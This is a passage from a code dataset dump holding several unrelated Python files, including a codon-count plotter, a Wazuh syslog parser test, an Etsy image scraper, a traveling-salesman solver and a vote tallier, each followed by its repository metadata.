\n data.pop('id')\n class_t.objects.create(**data)\n\n print(f'Table <{class_t.__name__}> has been filled with test data.'\n f' Number of records - {class_t.objects.count()}.')\n","repo_name":"Ilya-c4talyst/api_yamdb","sub_path":"api_yamdb/reviews/management/commands/filldb.py","file_name":"filldb.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35262675174","text":"\"\"\"\nMatching test for 2 graphs with branch and bound\n\"\"\"\nfrom tools import util, metric, load_graph_and_kernel as load_graph, show_results as sh\nimport numpy as np\nfrom hsic import convex_simple as convex_simple_hsic, branch_and_bound as branch\n\nif __name__ == '__main__':\n noyau = 5 # change according to the desired kernel\n noyaux = [\"structure + coordinates + depth\", \"coordinates + depth \", \"structure + depth\",\n \"structure + coordinates\", \"structure\", \"coordinates\", \"depth\"]\n K_list, graph_list = load_graph.load_graph_and_kernels(noyau)\n\n # numbers of the subjects to compare (between 0 and 133)\n s0 = 17\n s1 = 28\n\n g0 = graph_list[s0]\n g1 = graph_list[s1]\n\n k0 = K_list[s0]\n k1 = K_list[s1]\n k0 = util.normalized_matrix(k0) # data normalization\n k1 = util.normalized_matrix(k1)\n k0 = util.centered_matrix(k0)\n k1 = util.centered_matrix(k1)\n nb_pits = max(k0.shape[0], k1.shape[0])\n\n\n # prepare the data so that the matrices to compare have the same size\n # add \"fake\" pits that only resemble themselves (all 0s except a 1 in their column)\n K0 = np.eye(nb_pits)\n K1 = np.eye(nb_pits)\n\n if k0.shape[0] == nb_pits:\n K0 = k0\n else:\n for i in range(k0.shape[0]):\n for j in range(k0.shape[1]):\n K0[i, j] = k0[i, j]\n\n if k1.shape[0] == nb_pits:\n K1 = k1\n else:\n for i in range(k1.shape[0]):\n for j in range(k1.shape[1]):\n K1[i, j] = k1[i, j]\n\n # parameters\n mu = 1\n mu_min = 1e-6\n it = 350\n c = 1\n\n print(\"Comparing graphs\", s0, \"and\", s1)\n print(\"Kernel:\", noyaux[noyau])\n print(\"Parameters mu/mu_min/it/c with branch and bound:\", mu, mu_min, it, c)\n\n init = util.init_eig(K0, K1, nb_pits)\n constraint = branch.branch_and_bound(K0, K1, init, c, mu, mu_min, it)\n\n # transform the results for visualization\n match = np.zeros(len(constraint[0]))\n for i, j in constraint[0]:\n match[i] = j\n\n p = np.zeros((nb_pits, nb_pits))\n for i in range(match.shape[0]):\n p[i, int(match[i])] = 1\n\n obj = convex_simple_hsic.calcul_fobj(K0, K1, p)\n print(\"Objective function: \", obj[0])\n print(\"Mean of the geodesic distances\", metric.metric_geodesic_for_2(match, g0, g1))\n sh.show_sphere_for_2(match, g0, g1) # visualize the results\n","repo_name":"jujupapaye/graph_matching","sub_path":"executable_matching/two_graph_matching/test_branch.py","file_name":"test_branch.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20791919703","text":"import streamlit as st\nimport pandas as pd\nimport plotly.express as px\n\n\ndef lines(df: pd.DataFrame, container=st):\n fig = px.line(\n df,\n title=\"\",\n labels={\"date\": \"\", \"value\": \"\"},\n )\n fig.update_traces(mode=\"lines\", hovertemplate=\"%{y:f}\")\n fig.update_layout(\n margin={\"r\": 0, \"l\": 0, \"t\": 0, \"b\": 0},\n plot_bgcolor=\"rgba(0,0,0,0)\",\n legend=dict(\n orientation=\"h\",\n title=\"\",\n x=0,\n y=1.2,\n ),\n hovermode=\"x unified\",
\n dragmode=False,\n )\n fig.update_yaxes(\n tickformat=\"%0.2f\",\n gridcolor=\"#ddd\",\n side=\"left\",\n )\n container.plotly_chart(\n fig,\n use_container_width=True,\n config=dict(displayModeBar=False),\n )\n","repo_name":"simprecicchiani/keycloak-events-analytics","sub_path":"charts.py","file_name":"charts.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23944163837","text":"import matplotlib.pyplot as plt # For plotting the barplots\nimport pandas as pd # For table manipulation\nimport logging # For saving progress, modifications, and debugging information\nimport sys # For parsing command line arguments\n\n# Configure logging\nlogging.basicConfig(filename='logs.txt', level=logging.INFO)\nLOGGER = logging.getLogger(__name__)\n\n# Codon to Amino Acid conversion table\nCODON_TO_AMINO_TABLE = {\n # T C A G\n \"TTT\": \"Phe\", \"TTC\": \"Phe\", \"TTA\": \"Leu\", \"TTG\": \"Leu\",\n \"TCT\": \"Ser\", \"TCC\": \"Ser\", \"TCA\": \"Ser\", \"TCG\": \"Ser\",\n \"TAT\": \"Tyr\", \"TAC\": \"Tyr\", \"TAA\": \"stop\", \"TAG\": \"stop\",\n \"TGT\": \"Cys\", \"TGC\": \"Cys\", \"TGA\": \"stop\", \"TGG\": \"Trp\",\n \"CTT\": \"Leu\", \"CTC\": \"Leu\", \"CTA\": \"Leu\", \"CTG\": \"Leu\",\n \"CCT\": \"Pro\", \"CCC\": \"Pro\", \"CCA\": \"Pro\", \"CCG\": \"Pro\",\n \"CAT\": \"His\", \"CAC\": \"His\", \"CAA\": \"Gln\", \"CAG\": \"Gln\",\n \"CGT\": \"Arg\", \"CGC\": \"Arg\", \"CGA\": \"Arg\", \"CGG\": \"Arg\",\n \"ATT\": \"Ile\", \"ATC\": \"Ile\", \"ATA\": \"Ile\", \"ATG\": \"Met\",\n \"ACT\": \"Thr\", \"ACC\": \"Thr\", \"ACA\": \"Thr\", \"ACG\": \"Thr\",\n \"AAT\": \"Asn\", \"AAC\": \"Asn\", \"AAA\": \"Lys\", \"AAG\": \"Lys\",\n \"AGT\": \"Ser\", \"AGC\": \"Ser\", \"AGA\": \"Arg\", \"AGG\": \"Arg\",\n \"GTT\": \"Val\", \"GTC\": \"Val\", \"GTA\": \"Val\", \"GTG\": \"Val\",\n \"GCT\": \"Ala\", \"GCC\": \"Ala\", \"GCA\": \"Ala\", \"GCG\": \"Ala\",\n \"GAT\": \"Asp\", \"GAC\": \"Asp\", \"GAA\": \"Glu\", \"GAG\": \"Glu\",\n \"GGT\": \"Gly\", \"GGC\": \"Gly\", \"GGA\": \"Gly\", \"GGG\": \"Gly\"\n}\n\n\ndef count_codons(fasta_file, csv_file):\n '''\n Purpose:\n Count how many times each 3-character codon appears in the given file\n Parameter(s):\n fasta_file - The given file being read from\n csv_file - The file to be written to\n Return Value:\n A dictionary representing the codons and their corresponding counts\n '''\n LOGGER.info(f'Counting codons in {fasta_file}')\n codon_counts = {} # Initialize codon counter\n\n with open(fasta_file) as f: # Open input file\n for line in f: # Read sequences\n line = line.rstrip()\n if line.startswith('>'): # Lines that start with '>' are header lines that contain metadata about the sequence.\n continue\n if (len(line)-2) % 3 != 0: # Accounts for lines with length not evenly divisible by 3\n line = line[:len(line)-1]\n for i in range(0, len(line)-2, 3): # Iterate over sequence by codons\n codon = line[i:i+3]\n if codon in codon_counts: # Update codon count\n codon_counts[codon] += 1\n else:\n codon_counts[codon] = 1\n\n with open(csv_file, 'w') as f: # Write counts to output CSV file\n f.write(\"Codon,Count\\n\") # Write the header\n for codon, count in codon_counts.items():\n f.write(f\"{codon},{count}\\n\") # Write codon and count\n \n LOGGER.info(f'Finished counting, saving results to {csv_file}')\n \n return codon_counts\n\n\ndef convert_to_amino(codon_counts, output_csv_file):\n '''\n Purpose:\n Convert codon counts to amino acid counts and save them to a 
CSV file.\n Parameters:\n codon_counts - dictionary containing codon counts\n output_csv_file - file to save the amino acid counts in CSV format\n Return Value:\n None\n '''\n LOGGER.info(f'Counting amino acid in Codon Counts Dictionary')\n amino_acid_counts = {}\n \n for codon, count in codon_counts.items():\n amino_acid = CODON_TO_AMINO_TABLE.get(codon, \"Unknown\") # Retrieves codon value from conversion table; Returns \"Unknown\" if not found\n amino_acid_counts[amino_acid] = amino_acid_counts.get(amino_acid, 0) + count # Updates dictionary with the count of the amino acid.\n \n amino_acid_counts_df = pd.DataFrame(list(amino_acid_counts.items()), columns=[\"Amino Acid\", \"Count\"]) # Create a DataFrame from the amino acid counts\n \n amino_acid_counts_df.to_csv(output_csv_file, index=False) # Save the amino acid counts to a CSV file\n \n LOGGER.info(f'Saved amino acid counts to {output_csv_file}')\n\n\ndef plot_codons(gene_codons_csv, genome_codons_csv, output_png_file):\n '''\n Purpose:\n Generate a barplot comparing side-by-side the counts of each codon in the two different files\n Parameter(s):\n gene_codons_csv - input codon counts csv file for separate genes\n genome_codons_csv - input codon counts csv file for whole genome\n output_png_file - output png file for barplot\n Return Value:\n None\n '''\n # DataFrame of codon counts for separate genes and whole genome\n gene_codons_csv = pd.read_csv(gene_codons_csv)\n genome_codons_csv = pd.read_csv(genome_codons_csv) \n \n LOGGER.info(f'Loading CSV files: {gene_codons_csv}, {genome_codons_csv}')\n \n # Sort gene counts and genome counts in descending order by 'Count' column\n gene_codons_csv = gene_codons_csv.sort_values('Count', ascending=False)\n genome_codons_csv = genome_codons_csv.sort_values('Count', ascending=False)\n \n fig, ax = plt.subplots(figsize=(12, 6))\n \n # Adds a label for this set of bars, and Plots a bar chart using the 'Codon' column as x value and 'Frequency' as height.\n ax.bar(gene_codons_csv['Codon'], gene_codons_csv['Count'], label='Coding Sequences (correct frame shift)')\n ax.bar(genome_codons_csv['Codon'], genome_codons_csv['Count'], label='Whole Genome (random frame shift)')\n ax.set_xlabel('Codon')\n ax.set_ylabel('Frequency')\n ax.set_title('Codon Counts')\n ax.legend()\n \n # Rotate x-axis labels for better readability\n plt.xticks(rotation=90)\n \n # Automatically adjusts subplot parameters for better spacing, and saves the figure to provided file path\n plt.tight_layout()\n plt.savefig(output_png_file)\n plt.close()\n \n # Save progress to logger file\n LOGGER.info(f'Saved plot to {output_png_file}')\n \ndef plot_amino_acid(gene_amino_acid_csv, genome_amino_acid_csv, output_png_file):\n '''\n Purpose:\n Generate a barplot comparing side-by-side the counts of each amino acid in the two different files\n Parameter(s):\n gene_amino_csv_file - CSV file containing amino acid counts for separate genes\n genome_amino_csv_file - CSV file containing amino acid counts for the whole genome\n output_png_file - output png file for barplot\n Return Value\n None\n '''\n gene_amino_acid_csv = pd.read_csv(gene_amino_acid_csv)\n genome_amino_acid_csv = pd.read_csv(genome_amino_acid_csv)\n \n LOGGER.info(f'Loading CSV files: {gene_amino_acid_csv}, {genome_amino_acid_csv}')\n \n gene_amino_acid_csv = gene_amino_acid_csv.sort_values('Count', ascending=False)\n genome_amino_acid_csv = genome_amino_acid_csv.sort_values('Count', ascending=False)\n \n fig, ax = plt.subplots(figsize=(12, 6))\n \n 
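# Note: the two bar() calls below share the same x positions, so the genome series is drawn on top of the gene series (the bars are overlaid rather than grouped side by side).\n    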
ax.bar(gene_amino_acid_csv['Amino Acid'], gene_amino_acid_csv['Count'], label='Coding Sequences (correct frame shift)')\n ax.bar(genome_amino_acid_csv['Amino Acid'], genome_amino_acid_csv['Count'], label='Whole Genome (random frame shift)')\n ax.set_xlabel('Amino Acid')\n ax.set_ylabel('Frequency')\n ax.set_title('Amino Acid Counts')\n ax.legend()\n \n plt.xticks(rotation=90)\n \n plt.tight_layout()\n plt.savefig(output_png_file)\n plt.close()\n \n LOGGER.info(f'Saved amino acid plot to {output_png_file}')\n\ndef test():\n '''Test Driver for the program'''\n LOGGER.info('Running the program on a small fake genome file...')\n test_fasta = \"test_genome.fna\"\n test_genome_csv = \"test_genome.csv\"\n test_codon_counts = count_codons(test_fasta, test_genome_csv)\n \n\ndef main():\n '''Run entire program to generate codon and amino acid counts csv files.\n Also generate a barplot for both genome counts and amino acid counts.'''\n \n # Generate gene and genome codon CSVs\n LOGGER.info('Generating CSV files...')\n gene_fasta = \"SARS-CoV-2_separate_genes.fna\"\n gene_csv = \"separate_genes.csv\"\n genome_fasta = \"SARS-CoV-2_whole_genome.fna\"\n genome_csv = \"whole_genome.csv\"\n gene_codons = count_codons(gene_fasta, gene_csv)\n genome_codons = count_codons(genome_fasta, genome_csv)\n \n # Codon plot\n LOGGER.info('Generating codon usage barplot...')\n codon_png = \"codon_counts.png\"\n plot_codons(gene_csv, genome_csv, codon_png)\n \n # Convert codons counts to amino acid counts\n LOGGER.info('Converting codons to amino acid...')\n LOGGER.info('Generating amino acid CSV files...')\n gene_amino_csv = \"gene_amino_counts.csv\"\n genome_amino_csv = \"genome_amino_counts.csv\"\n convert_to_amino(gene_codons, gene_amino_csv)\n convert_to_amino(genome_codons, genome_amino_csv)\n \n # Amino acid plot\n LOGGER.info('Generating amino acid usage barplot...')\n amino_png = \"amino_acids_counts.png\"\n plot_amino_acid(gene_amino_csv, genome_amino_csv, amino_png)\n\n \nif __name__ == '__main__':\n try:\n if len(sys.argv) == 3:\n # Codon CSV generation\n LOGGER.info('Generating Codon counts CSV file...')\n count_codons = count_codons(sys.argv[1], sys.argv[2])\n else:\n LOGGER.info('Running the entire program...')\n # test()\n main()\n except Exception as e:\n LOGGER.exception('Error running program')\n \n ","repo_name":"curtiskokuloku/CodonCountingVisualization","sub_path":"count_codons.py","file_name":"count_codons.py","file_ext":"py","file_size_in_byte":10063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2522975697","text":"import os\r\nfrom time import sleep\r\nfrom clicknium import clicknium as cc, locator, ui\r\nimport requests\r\n\r\nsearch_key_word = 'mobile phone bag'\r\n\r\ndef main():\r\n # open the website\r\n tab = cc.chrome.open(\"https://www.etsy.com/sg-en/?ref=lgo\")\r\n\r\n # input search keyword,and click the search button\r\n tab.find_element(locator.etsy.txt_search).set_text(search_key_word)\r\n tab.find_element(locator.etsy.btn_search).click()\r\n\r\n # wait 4 second to loading content\r\n sleep(4)\r\n\r\n # set sort by \r\n tab.find_element(locator.etsy.btn_dropdown).click()\r\n tab.find_element(locator.etsy.dropdown_item_most_recent).click()\r\n sleep(4)\r\n\r\n # try get the top 5 pages \r\n for page_count in range(0,5):\r\n similar_elements_img = tab.find_elements(locator.etsy.similar_img)\r\n print(f'page_count:{page_count}, similar_elements_img length:{len(similar_elements_img)}')\r\n\r\n index = 0\r\n for img in 
similar_elements_img:\r\n download_img(img,index)\r\n index+=1\r\n disabled = tab.find_element(locator.etsy.btn_next_page).get_property('disabled')\r\n if(disabled == 'true'):\r\n break\r\n else:\r\n tab.find_element(locator.etsy.btn_next_page).click()\r\n sleep(4)\r\n sleep(3)\r\n tab.close()\r\n \r\n\r\ndef download_img(img_obj,index):\r\n \r\n img_src = img_obj.get_property('src')\r\n print(f'index:{index},start download: {img_src}...')\r\n \r\n # img = requests.get(img_src, \r\n # proxies=dict(http='socks5://127.0.0.1:10808',\r\n # https='socks5://127.0.0.1:10808'))\r\n\r\n img = requests.get(img_src)\r\n\r\n filepath = './download/'+img_src.split('/')[-1]\r\n i = 1\r\n while(os.path.exists(filepath)):\r\n filepath = f'./download/{img_src.split(\"/\")[-1].split(\".\")[0]}-{i}.jpg'\r\n i+=1\r\n with open(filepath,'wb') as f:\r\n f.write(img.content)\r\n print(f'index:{index},download success!')\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"automation9417/etsy","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18382543021","text":"import os\nimport re\nimport pytest\nfrom time import sleep\n\nfrom wazuh_testing import ARCHIVES_JSON_PATH\nfrom wazuh_testing.tools import file\nfrom wazuh_testing.tools.configuration import load_configuration_template, get_test_cases_data\nfrom wazuh_testing.tools.run_simulator import syslog_simulator\nfrom wazuh_testing.tools.thread_executor import ThreadExecutor\n\n\npytestmark = [pytest.mark.tier(level=0)]\n\n# Reference paths\nTEST_DATA_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\nCONFIGURATIONS_PATH = os.path.join(TEST_DATA_PATH, 'configuration_template')\nTEST_CASES_PATH = os.path.join(TEST_DATA_PATH, 'test_cases')\nSYSLOG_SIMULATOR_START_TIME = 2\n\n# Configuration and cases data\nt1_configurations_path = os.path.join(CONFIGURATIONS_PATH, 'configuration_syslog_message_parser.yaml')\nt1_cases_path = os.path.join(TEST_CASES_PATH, 'cases_syslog_message_parser.yaml')\n\n# Syslog message IPV6 values test configurations (t1)\nt1_configurations_parameters, t1_configurations_metadata, t1_cases_ids = get_test_cases_data(t1_cases_path)\nt1_configurations = load_configuration_template(t1_configurations_path, t1_configurations_parameters,\n t1_configurations_metadata)\n\n\n@pytest.mark.parametrize('configuration, metadata', zip(t1_configurations, t1_configurations_metadata),\n ids=t1_cases_ids)\ndef test_syslog_message_parser(configuration, metadata, set_wazuh_configuration, truncate_event_logs,\n restart_wazuh_daemon_function):\n '''\n description: Check if 'wazuh-remoted' can receive syslog messages through the socket.\n\n test_phases:\n - setup:\n - Apply ossec.conf configuration changes according to the configuration template and use case.\n - Truncate wazuh event logs.\n - Restart wazuh-manager service to apply configuration changes.\n - test:\n - Check that the messages are parsed correctly in the archives.json file.\n - teardown:\n - Truncate wazuh logs.\n - Restore initial configuration, both ossec.conf and local_internal_options.conf.\n\n wazuh_min_version: 4.4.0\n\n parameters:\n - configuration:\n type: dict\n brief: Get configurations from the module.\n - metadata:\n type: dict\n brief: Get metadata from the module.\n - set_wazuh_configuration:\n type: fixture\n brief: Apply changes to the ossec.conf configuration.\n - truncate_event_logs:\n type: fixture\n 
brief: Truncate wazuh event logs.\n - restart_wazuh_daemon_function:\n type: fixture\n brief: Restart the wazuh service.\n\n assertions:\n - Verify the syslog message is received and parsed correctly.\n\n input_description:\n - The `configuration_syslog_message_parser` file provides the module configuration for this\n test.\n - The `cases_syslog_message_parser` file provides the test cases.\n\n expected_output:\n - fr'\"full_log\":\"{message}\".*\"location\":\"{location}\"'\n '''\n # Set syslog simulator parameters according to the use case data\n syslog_simulator_parameters = {'address': metadata['address'], 'port': metadata['port'],\n 'protocol': metadata['protocol'],\n 'messages_number': metadata['messages_number'],\n 'message': metadata['message']}\n\n # Run syslog simulator thread\n syslog_simulator_thread = ThreadExecutor(syslog_simulator, {'parameters': syslog_simulator_parameters})\n syslog_simulator_thread.start()\n\n # Wait until syslog simulator is started\n sleep(SYSLOG_SIMULATOR_START_TIME)\n\n # Read the events log data\n events_data = file.read_file(ARCHIVES_JSON_PATH).split('\\n')\n\n message = metadata['message']\n location = metadata['address']\n find_msg = (fr'\"full_log\":\"{message}\".*\"location\":\"{location}\"').replace('\"', r'\\\"')\n\n event_msg = [event for event in events_data if bool(re.match(fr\".*{find_msg}.*\", event))]\n\n assert len(event_msg) == metadata['messages_number'], \"The event's format is not the expected one\"\n\n # Wait until syslog simulator ends\n syslog_simulator_thread.join()\n","repo_name":"wazuh/wazuh-qa","sub_path":"tests/integration/test_remoted/test_socket_communication/test_syslog_message_parser.py","file_name":"test_syslog_message_parser.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"10073361674","text":"def square_digits (num) :\n digits = [d for d in str(num)]\n\n i = 0\n for d in digits :\n digits[i] = str(int(d)**2)\n i += 1\n\n digits = \"\".join(digits)\n digits = int(digits)\n return digits\n\n\n\nn = 1234\nprint(square_digits(n))","repo_name":"mmdaz/my_solved_algorithm_problems","sub_path":"old-codes/square_digits.py","file_name":"square_digits.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3080822340","text":"import jieba# word segmentation module\nimport re\nimport collections\nf=open('51job岗位信息.txt','r',encoding='utf-8',errors='ignore')\ntext=f.read()# read the file\nf.close()\npattern='[^0-9a-zA-Z\\W_]+'\njob_info=re.findall(pattern,text)# returns a list\n\nresult=list(jieba.cut(' '.join(job_info)))# extract the common words from the string and return a string\n# print(list(result))\nprint(collections.Counter(result))\n\n# set the word cloud background\nimport numpy as np# pip install numpy\nimport PIL.Image as img# pip install PIL\nfrom wordcloud import WordCloud\nmask=np.array(img.open('D:\\\\pycharm\\\\pycharm_dm\\\\a课程资料一阶段\\\\爱心.jpg'))\n# print(mask)\nwordcloud=WordCloud(\n mask=mask,\n width=800,height=600,background_color='white',\n font_path='C:\\\\Windows\\\\Fonts\\\\msyh.ttc',# a font that can parse Chinese characters must be loaded if any are present\n max_font_size=500,min_font_size=20\n).generate(' '.join(result))\nimage=wordcloud.to_image()\n# image.show()# show the generated image\nwordcloud.to_file('岗位要求词云图.png')# generate the file locally for display
\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"steadyrays/usermaster","sub_path":"python/python_base/class30_职位要求分析.py","file_name":"class30_职位要求分析.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73142059893","text":"# Course: CS4306-01\n# Student name: Jonathan Miu\n# Student ID: 000456452\n# Programming Assignment #3\n# Due Date: November 13, 2018\n# Signature: jmiu\n# (The signature means that the program is your own work)\n# Score: ______________\n\n\nimport random\nimport sys\nimport time\nimport os.path\nimport json\n\nfilename = 'export'\nrandom.seed()\n\ndef create_matrix(size) :\n\tglobal matrix\n\tmatrix = []\n\tfor i in range(size) :\n\t\ttemplist = []\n\t\tfor i in range(size) :\n\t\t\ttemplist.append(0)\n\t\tmatrix.append(templist)\n\ndef randomize_matrix(max, chance) :\n\tglobal matrix\n\tfor i in range(len(matrix)) :\n\t\tfor j in range(len(matrix[i])) :\n\t\t\tif i != j and random.random() <= chance :\n\t\t\t\tmatrix[i][j] = random.randint(1, max)\n\t# just trying to make sure the matrix is actually solvable (it might still not be after this, but it helps)\n\tfor i in range(len(matrix)) :\n\t\tsolvable = False\n\t\tfor j in range(len(matrix[i])) :\n\t\t\tif matrix[i][j] > 0 :\n\t\t\t\tsolvable = True\n\t\tif not solvable :\n\t\t\tj = i\n\t\t\twhile j == i :\n\t\t\t\tj = random.randint(0, len(matrix[i]) - 1)\n\t\t\tmatrix[i][j] = random.randint(1, max)\n\ndef print_matrix() :\n\tfor i in range(len(matrix)) :\n\t\tprint(matrix[i])\n\ndef is_int(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\ndef is_float(s):\n try: \n float(s)\n return True\n except ValueError:\n return False\n\ndef find_shortest(start) :\n\tglobal matrix\n\tfailures = []\n\tpath = []\n\tcurrent = start\n\t# just give up after this many failures (there seems to be a bug causing it to occasionally run forever that I just *can't* find)\n\tmaxfailures = 10000 #len(matrix) * len(matrix[current])\n\n\twhile len(path) < len(matrix) :\n\t\tshortest = [-1, sys.maxsize]\n\t\tif len(path) + 1 < len(matrix) :\n\t\t\tfor j in range(0, len(matrix[current])) :\n\t\t\t\tif matrix[current][j] > 0 and matrix[current][j] < shortest[1] and j not in path and path + [current, j] not in failures :\n\t\t\t\t\tshortest = [j, matrix[current][j]]\n\t\t\tif (shortest[0]) >= 0 :\n\t\t\t\tpath.append(current)\n\t\t\t\tcurrent = shortest[0] # j\n\t\t\telse : # failure found\n\t\t\t\tfailures.append(path + [current])\n\t\t\t\tif len(path) > 0 :\n\t\t\t\t\tcurrent = path.pop() # reset current\n\t\t\t\telse :\n\t\t\t\t\tcurrent = start\n\t\telse : # make sure that path[-1] can connect to path[0]\n\t\t\tif matrix[path[-1]][path[0]] > 0 : # woohoo, they connect!\n\t\t\t\tpath = path + [current, path[0]]\n\t\t\telse : # failure\n\t\t\t\tfailures.append(path + [current])\n\t\t\t\tif len(path) > 0 :\n\t\t\t\t\tcurrent = path.pop() # reset current\n\t\t\t\t\tif len(path) > 0 :\n\t\t\t\t\t\tcurrent = path.pop() # reset current\n\t\t\t\t\telse :\n\t\t\t\t\t\tcurrent = start\n\t\t\t\telse :\n\t\t\t\t\tcurrent = start\n\t\t# some debug prints, enable the sleep message otherwise it's unreadable\n\t\t#print(\"failures:\", failures)\n\t\t#print(\"path:\", path + [current])\n\t\t#time.sleep(0.1) \n\t\tif path + [current] in failures or len(failures) > maxfailures :\n\t\t\treturn [sys.maxsize, []]\n\n\treturn [walk_path(path), path]\n\ndef save_matrix(filename) :\n\tglobal matrix\n\twith open(filename, 'w') as file :
\n\t\tfile.write(json.dumps(matrix))\n\tprint(\"saved as\", filename)\n\ndef load_matrix(filename) :\n\tglobal matrix\n\twith open(filename, 'r') as file :\n\t\tmatrix = json.load(file)\n\ndef validate_answer(path) :\n\tglobal matrix\n\tif len(path) != len(matrix) + 1 or path[0] != path[-1] :\n\t\treturn False\n\tnode = 0\n\twhile node < len(matrix) :\n\t\tif node in path :\n\t\t\tnode = node + 1\n\t\telse :\n\t\t\treturn False\n\treturn True\n\ndef walk_path(path) :\n\tglobal matrix\n\tlength = 0\n\t# add up the edge weights between consecutive nodes along the path\n\tfor i in range(1, len(path)) :\n\t\tlength = length + matrix[path[i-1]][path[i]]\n\treturn length\n\nmatrix = None\n\nsize = 10\nmaxlen = 100\nchance = 0.5\nif len(sys.argv) > 1 :\n\tif is_int(sys.argv[1]) : size = int(sys.argv[1])\n\telif os.path.isfile(sys.argv[1]) :\n\t\tload_matrix(sys.argv[1])\n\tif len(sys.argv) > 2 and is_int(sys.argv[2]) :\n\t\tmaxlen = int(sys.argv[2])\n\t\tif len(sys.argv) > 3 and is_float(sys.argv[3]) :\n\t\t\tchance = float(sys.argv[3])\nelse :\n\tprint(\"You can specify how the matrix is generated by inputting variables: python tsp.py {matrix size} {max distance} {chance of adding connection (0 to 1)} ex: python tsp.py 100 100 0.5\")\n\tprint(\"or simply pass the filename of a matrix in json format: python tsp.py matrix.json\")\n\nif matrix is None :\n\tcreate_matrix(size)\n\trandomize_matrix(maxlen, chance)\n\nif len(matrix) <= 50 :\n\tprint_matrix()\nelse :\n\tprint(\"not printing matrix because it's too huge and wouldn't be helpful anyway\")\n\nprint(\"finding smallest \", end='', flush=True)\n# print dot every so many calculations\ndots = len(matrix) / 100\nhowmanydots = 1 / dots\nif howmanydots < 1 :\n\thowmanydots = 1\nhowmanydots = int(howmanydots)\nprintdot = 0\nsmallest = [sys.maxsize, []]\nfor i in range(len(matrix)) :\n\tanswer = find_shortest(i)\n\tprintdot = printdot + 1\n\tif printdot >= dots :\n\t\tif len(answer[1]) <= 0 :\n\t\t\tfor j in range(howmanydots) :\n\t\t\t\tprint(\"x\", end='', flush=True)\n\t\telse :\n\t\t\tfor j in range(howmanydots) :\n\t\t\t\tprint(\".\", end='', flush=True)\n\t\tprintdot = 0\n\tif smallest[0] > answer[0] :\n\t\tsmallest = answer\nprint(\" done.\")\nprint(\"Is answer valid (contains every point):\", validate_answer(smallest[1]))\n\nprint(\"distance:\", smallest[0], \"\\npath:\", smallest[1])\n#print(answer[1])\n#print(answer[1][:5])\nfilename = input(\"Save matrix? Enter filename to save, or leave blank to cancel. 
(recommended to add .json)\\n>\")\nif len(filename) > 0 :\n\tsave_matrix(filename)\nprint(\"done.\")","repo_name":"DanielleMiu/Travelling-Salesman","sub_path":"tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6040801497","text":"import os\nimport csv\n\ntotal_votes=0\nwinner_vote=0\nwinner=\"\"\ncandidates=[]\nvote_counter={}\nvote_percentage=[]\nmax_vote=0\n\ncsvpath=os.path.join(\"..\", \"Resources\", \"election_data.csv\")\n\nwith open (csvpath, newline=\"\") as csvfile:\n \n csvreader=csv.reader(csvfile, delimiter=\",\")\n next(csvreader, None)\n \n for row in csvreader:\n candidate=row[2]\n \n if candidate in candidates:\n vote_counter[candidate]+=1\n else:\n candidates.append(candidate)\n vote_counter[candidate]=1\n total_votes+=1\n\nfor i in range(len(candidates)):\n\tvote_share = round((vote_counter[candidates[i]]/total_votes)*100, 3)\n\tvote_percentage.append(vote_share)\n\tif vote_counter[candidates[i]] > max_vote:\n\t\tmax_vote = vote_counter[candidates[i]]\n\t\twinner = candidates[i]\n\nprint(\"Election Results\")\nprint(\"-------------------------------------\")\nprint(f'Total Votes:{total_votes}')\nprint(\"-------------------------------------\")\nfor i in range(len(candidates)):\n\tprint(f'{candidates[i]} : {vote_percentage[i]} % ( {vote_counter[candidates[i]]})')\nprint(\"-------------------------------------\")\nprint(f'Winner: {winner}')\nprint(\"------------------------------------- \")\n\n\noutput= open(\"Election Results.txt\",\"w+\")\noutput.write(\"Election Results \\n\")\noutput.write(\"------------------------------------- \\n\")\noutput.write(f'Total Votes: {total_votes} \\n')\noutput.write(\"------------------------------------- \\n\")\nfor i in range(len(candidates)):\n\toutput.write(f'{(candidates[i])} : {(vote_percentage[i])} % {vote_counter[candidates[i]]} \\n')\noutput.write(\"------------------------------------- \\n\")\noutput.write(f'Winner: {winner}' + \"\\n\")\noutput.write(\"------------------------------------- \\n\")\noutput.close()","repo_name":"akshitarora19/Python-PyBank-PyPoll","sub_path":"main_PyPoll.py","file_name":"main_PyPoll.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23175176310","text":"import os\nfrom Bio import Entrez\nfrom Bio import SeqIO\n\n__location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\nfile = open(os.path.join(__location__,\"rosalind_frmt.txt\"), \"r\")\n\ninputStr = file.read().replace(\" \", \", \")\n\nEntrez.email = \"henrique.almeida@unifesp.br\"\nhandle = Entrez.efetch(db=\"nucleotide\", id=[inputStr], rettype=\"fasta\")\nhandleOut = Entrez.efetch(db=\"nucleotide\", id=[inputStr], rettype=\"fasta\")\nrecordsOut = handleOut.read().split(\"\\n\\n\")\nrecords = list(SeqIO.parse(handle, \"fasta\"))\n\nminIdx = 0\n\nfor idx in 